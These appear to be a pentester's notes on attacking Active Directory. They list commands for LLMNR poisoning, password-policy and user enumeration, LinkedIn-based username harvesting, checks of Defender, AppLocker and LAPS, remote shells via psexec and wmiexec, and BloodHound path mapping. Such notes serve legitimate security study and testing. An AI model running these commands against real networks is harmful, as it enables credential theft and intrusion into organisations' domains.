Attack AD

LLMNR/NBT-NS poisoning

Tools

Responder

Needed port : UDP:137, UDP138, UDP53, UDP/TCP389, TCP1433, UDP1434, TCP80, TCP135, TCP139, TCP445, TCP21, TCP3141, TCP25, TCP110, TCP587, TCP3128, Multicast UDP 5355 & 5353

Inveigh (Good for console mode with escape key)

2 version, compiled and PS1, PS1 is deprecated

Metasploit
Hashcat when we got the hashes

Password spraying

Enumerating password policy :

Crackmapexec
Netexec
rpcclient > querydominfo
enum4linux
ldapsearch
PowerView

crackmapexec smb 192.168.1.0/24  -u '' -p ''  --pass-pol

netexec DOMAIN/Administrator:Password123@10.0.0.15  "net accounts /domain"

rpcclient -U "DOMAIN\\Administrator%Password123" 10.0.0.15 \
  -c querydominfo

enum4linux -a 10.0.0.15

ldapsearch -x \
  -H ldap://10.0.0.15 \
  -D "CN=Administrator,CN=Users,DC=domain,DC=com" \
  -w Password123 \
  -b "CN=Password Policy,CN=System,DC=domain,DC=com" \
  "(objectClass=*)"

Import-Module ./PowerView.ps1
Get-DomainPasswordPolicy

Making target user List

Wordlist

statistically likely username

OSINT

linkedin2username

Tools

enum4linux
netexec
crackmapexec
windapsearch
kerbrute

python3 linkedin2username.py -c "Acme Corp" -n acme.com -d 2 -o acme_usernames.txt

enum4linux -U 10.10.0.5

netexec DOMAIN/Administrator:Passw0rd!@10.10.0.252 "net user /domain"

crackmapexec smb 10.10.0.0/24 -u svc_scan -p 'P@ssw0rd123' --users

windapsearch.py -d example.com -u 'EXAMPLE\\ldapbind' -p 'BindP@ss!' -U

kerbrute userenum -d example.com usernames.txt

Enumerating security controls

Defender

Get-MpComputerStatus

AppLocker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Powershell

$ExecutionContext.SessionState.LanguageMode

LAPS

Find-LAPSDelegatedGroups
Find-AdmPwdExtenderRights
Get-LAPSComputers

Remote shell

PSExec

doit déposé un exe pour ouvrir un shell, le user doit etre admin local

psexe.py [DOMAIN]/[USER]:[PWD]@[IP]

WMIExec

se sert des commandes WMI pour lancer un cmd.exe

wmiexec.py [DOMAIN]/[USER]:[PWD]@[IP]

Shortest path

Bloodhound|Rusthound

sudo rusthound -u [USER] -p [PWD] -ns [IP] -d [DOMAIN] -c all

Glossary

LLMNR (Link Local Multicast Name Resolution | UDP:5355) / NBT-NS (NetBIOS Name Service | UDP:137) : Services that allows host id when DNS fail